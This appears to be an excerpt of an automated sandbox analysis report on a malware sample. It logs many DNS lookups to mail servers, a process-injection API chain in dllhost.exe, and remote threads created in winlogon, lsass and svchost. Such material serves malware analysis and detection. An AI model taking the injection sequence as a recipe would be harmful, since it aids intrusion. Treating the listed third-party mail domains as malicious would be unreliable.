                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.hyacinthhouse.se
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.giochi0.it
                      Source: C:\Windows\System32\svchost.exeDomain query: aspmx4.googlemail.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.dynamicpayoff.com
                      Source: C:\Windows\System32\svchost.exeDomain query: i-dear2.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.servicioscorporativos.mx
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.cardnet.co.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.elhassociates.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.hexatech.com.my
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.frontier.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.gelsennet.de
                      Source: C:\Windows\System32\svchost.exeDomain query: muum.com.tr
                      Source: C:\Windows\System32\svchost.exeDomain query: chrislittell.com
                      Source: C:\Windows\System32\svchost.exeDomain query: augustakom.net
                      Source: C:\Windows\System32\svchost.exeDomain query: vera.com.uy
                      Source: C:\Windows\System32\svchost.exeDomain query: out.lollygaggeru.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.convertor-3gp.com
                      Source: C:\Windows\System32\svchost.exeDomain query: pec.it
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.sps-co.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.paris-ag.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.xtremexcavation.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.capaci.de
                      Source: C:\Windows\System32\svchost.exeDomain query: docomo.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: out.mpost.co.nz
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.marley.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.southeastrec.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.frigus.eu
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.windstream.net
                      Source: C:\Windows\System32\svchost.exeDomain query: sunrise.ch
                      Source: C:\Windows\System32\svchost.exeDomain query: dvc.vn
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.marginalis.se
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.tmd-tunelmuhendisligi.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.bpmconsultants.in
                      Source: C:\Windows\System32\svchost.exeDomain query: out.clements1975.fslife.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: spektrum.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: out.grupo-neo.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.aueb.gr
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.generic-isp.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.i.ua
                      Source: C:\Windows\System32\svchost.exeDomain query: out.theploughinn.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ms-scorpio.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.exois.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.tamkinhochberg.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.moenchs-waldhotel.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.apotecbay.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx2c28.carrierzone.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.e-olympics.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.selfcateringinknysna.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.oita.jtuc-rengo.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: cloud15.spamtitan.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.techsolutionscanada.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.mairie-habsheim.de
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.ding.com
                      Source: C:\Windows\System32\svchost.exeDomain query: ceti.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.rlmorgan.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.allianceinsurance.in
                      Source: C:\Windows\System32\svchost.exeDomain query: bhs-is.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: interia.eu
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.casadociclista.net.br
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.pflege.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.jcom.home.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: heidester.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.hughes.net
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.fivefigureweeks.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.gemicomp.com.ar
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.firstfriends.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.inwind.it
                      Source: C:\Windows\System32\svchost.exeDomain query: out.clayton.k.ga.us
                      Source: C:\Windows\System32\svchost.exeDomain query: out.web-schaaf.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.laser.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: vermesser.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.gammu.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.credibo.it
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.abcnetworkingu.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.testroamright.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.pinnaclesettlements.com
                      Source: C:\Windows\System32\svchost.exeDomain query: lykal.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.mandres.de
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.lebcedars.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.bleisetzer.de
                      Source: C:\Windows\System32\svchost.exeDomain query: dzv-netz.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.arenaholidays.net
                      Source: C:\Windows\System32\svchost.exeDomain query: lfsvechta.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.gfgfgf.org
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.bindifencing.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ldbcargas.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: laudioikastola.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.etica.conc-bmw.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.netines.net
                      Source: C:\Windows\System32\svchost.exeDomain query: womenjapan.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp-01.tld.t-online.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.virgin.net
                      Source: C:\Windows\System32\svchost.exeDomain query: kefgames.net
                      Source: C:\Windows\System32\svchost.exeDomain query: digcom-ca.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.fkksol.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.csgs.com
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.saluscm.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.grafikdev.com
                      Source: C:\Windows\System32\svchost.exeDomain query: autograf.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.milaus.net
                      Source: C:\Windows\System32\svchost.exeDomain query: ms5.ncv.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.xplornet.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.hif.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.theoxfordhotel.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.centurylink.net
                      Source: C:\Windows\System32\svchost.exeDomain query: aqua.daa.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: out.bysources.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.lcampino.cl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ucr.ac.cr
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.fluid.demon.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.skidfamily.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.hotmy.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.irvineproject.cn
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.desomniac.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx0.uniserve.com
                      Source: C:\Windows\System32\svchost.exeDomain query: noos.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: mx.adephia.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.q.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cefnogi.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cssd.org
                      Source: C:\Windows\System32\svchost.exeDomain query: hofmann-geraberg.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ig.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.begames.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.atlanticbb.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.y4hoo.com
                      Source: C:\Windows\System32\svchost.exeDomain query: lengau.info.bw
                      Source: C:\Windows\System32\svchost.exeDomain query: mx3.ovh.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.barbassa.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.avis.cl
                      Source: C:\Windows\System32\svchost.exeDomain query: out.rostele.com
                      Source: C:\Windows\System32\svchost.exeDomain query: numeo.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: oapv.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: constelacionesmadrid.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ezweb.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.casscomm.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.shortlinesales.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.citromail.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.framgangsrikaforetag.se
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.oldenglishchurch.org.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.wtqudu.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.tecdev.it
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.americanaugers.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: ozonekayak-com.mail.protection.outlook.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx-1.dpoczta.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.netzero.net
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.mchscares.org
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.tempcloud.info
                      Source: C:\Windows\System32\svchost.exeDomain query: grafmueller-schuhe.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.dolores.art.br
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.venter.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.netzero.com
                      Source: C:\Windows\System32\svchost.exeDomain query: viha.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: out.therightweigh.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.optonline.net
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ivan-elkin.name
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.dk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.vanwoerdekom.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.eclplastics.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: out.multicopia360.com
                      Source: C:\Windows\System32\svchost.exeDomain query: telefonica.net
                      Source: C:\Windows\System32\svchost.exeDomain query: out.internet.club.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: d178078a.ess.barracudanetworks.com
                      Source: C:\Windows\System32\svchost.exeDomain query: in4.sk
                      Source: C:\Windows\System32\svchost.exeDomain query: airrivals.pl
                      Source: C:\Windows\System32\svchost.exeDomain query: gruesshaber.de
                      Source: C:\Windows\System32\svchost.exeDomain query: mx2.321.com
                      Source: C:\Windows\System32\svchost.exeDomain query: tvsnaples.org
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.polar-transport.cz
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.mjbelda.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.cotamicro.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: wss-docs.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.integrapost.cl
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.atlanticexpress.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.futterplatzerl.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.hacked.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.limpec.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: out.shop-e-nfinite.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.hightelecom.com
                      Source: C:\Windows\System32\svchost.exeDomain query: i.softbank.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: btconnect.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.bresnan.net
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.mamasimon.de
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.freemail.hu
                      Source: C:\Windows\System32\svchost.exeDomain query: hooter.com
                      Source: C:\Windows\System32\svchost.exeDomain query: imsinc01.filter2.lastspam.com
                      Source: C:\Windows\System32\svchost.exeDomain query: softbank.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: virtualworkforcepro.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.sputtr.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.emarki.com.br
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.milenio.com
                      Source: C:\Windows\System32\svchost.exeDomain query: 94c8b50eb70aa4c8.com
                      Source: C:\Windows\System32\svchost.exeDomain query: cajememotors.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mx1.ovh.net
                      Source: C:\Windows\System32\svchost.exeDomain query: aspmx2.googlemail.com
                      Source: C:\Windows\System32\svchost.exeDomain query: bulkeley.navy.mil
                      Source: C:\Windows\System32\svchost.exeDomain query: dominy.f9.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.apollosouth.com
                      Source: C:\Windows\System32\svchost.exeDomain query: proxmea.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.uchisyakyo.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: out.rapeli.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.stein-druck.de
                      Source: C:\Windows\System32\svchost.exeDomain query: test789.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.oaktreefinancial.ca
                      Source: C:\Windows\System32\svchost.exeDomain query: fsmail.net
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.sayclub.com
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.brpindustries.com.au
                      Source: C:\Windows\System32\svchost.exeDomain query: mx37.mb5p.com
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.univers-actu.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.pacnet.netau
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.ziggo.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: blakehurst.com
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.postmaster.co.uk
                      Source: C:\Windows\System32\svchost.exeDomain query: loens.nl
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.forfas.ie
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.antasinsaat.com
                      Source: C:\Windows\System32\svchost.exeDomain query: out.muenzen-becker.de
                      Source: C:\Windows\System32\svchost.exeDomain query: laga.se
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.virgilio.it
                      Source: C:\Windows\System32\svchost.exeDomain query: securesmtp.scoilmhuirelongford.ie
                      Source: C:\Windows\System32\svchost.exeDomain query: smtp.market-wave.link
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.2cr-h.fr
                      Source: C:\Windows\System32\svchost.exeDomain query: mail.nexgo.de
                      Source: C:\Windows\System32\svchost.exeDomain query: out.marin.club.ne.jp
                      Source: C:\Windows\System32\svchost.exeDomain query: hyacinthhouse.se
                      Source: C:\Windows\System32\svchost.exeDomain query: relay.upm.es
                      Source: C:\Windows\System32\svchost.exeDomain query: out.horizon-xl.de
                      Source: C:\Windows\System32\svchost.exeDomain query: secure.elitter.net
                      Source: C:\Windows\System32\svchost.exeDomain query: aspmx.l.google.com
Source: C:\Windows\System32\dllhost.exe | Code function: 7_2_000000014000242C CreateProcessW, VirtualAllocEx, WriteProcessMemory, VirtualProtectEx, WriteProcessMemory, VirtualProtectEx, VirtualAlloc, GetThreadContext, WriteProcessMemory, SetThreadContext, VirtualAllocEx, WriteProcessMemory, VirtualProtectEx, WriteProcessMemory, VirtualProtectEx, VirtualAlloc, Wow64GetThreadContext, WriteProcessMemory, Wow64SetThreadContext, ResumeThread, OpenProcess, TerminateProcess
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\winlogon.exe EIP: 58952A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\lsass.exe EIP: ADFC2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: DD592A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\dwm.exe EIP: CA32A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: E1072A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 8C1D2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 97FD2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 652E2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A27C2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 87DA2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: FB3C2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5672A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: C1F32A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: E3BC2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 38952A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 6E562A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 1FF72A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: F352A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 79572A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: A462A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 13112A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 8C582A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5F1D2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 5D9C2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: AEC92A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: DC1B2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 82532A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\spoolsv.exe EIP: A62A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: 66EB2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: FD9A2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: C:\Windows\System32\svchost.exe EIP: CEDB2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 42792A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B6F32A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 8DCC2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 73732A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: F9DA2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 6CCC2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 39D92A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: FA392A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B7272A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 53B52A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: E88A2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 77B52A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 5D342A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: B5E12A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 59992A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 53C22A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 41D42A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: ADAD2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3072A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 4DB2A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 3202A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: C5282A78
Source: C:\Windows\System32\dllhost.exe | Thread created: unknown EIP: 76AA2A78
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F1B32A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F34B2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DE4D2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 74472A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A9D02A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF8A2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D8932A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E932A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43DC2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 97E32A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DC872A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 698D2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F9062A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 34C52A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 43542A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 84342A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 58922A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 39382A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9321BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A6AD2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: E2CD2A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 34C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BB742A78Jump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11921BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6D21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15721BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CF21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A421BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10621BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15921BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C221BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2E021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9B21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7B21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28721BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6E21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8F21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22921BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28B21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26421BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15721BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AD21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6521BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9D21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2B221BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 28721BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DA21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6B21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C421BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2A521BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 29621BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2C121BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D821BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2ED21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BC21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 25021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2AE21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10121BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2DF21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 24821BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A021BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 2CD21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 22C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12621BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9C21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8521BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ED21BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13621BFJump to behavior
                      Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C21BFJump to behavior
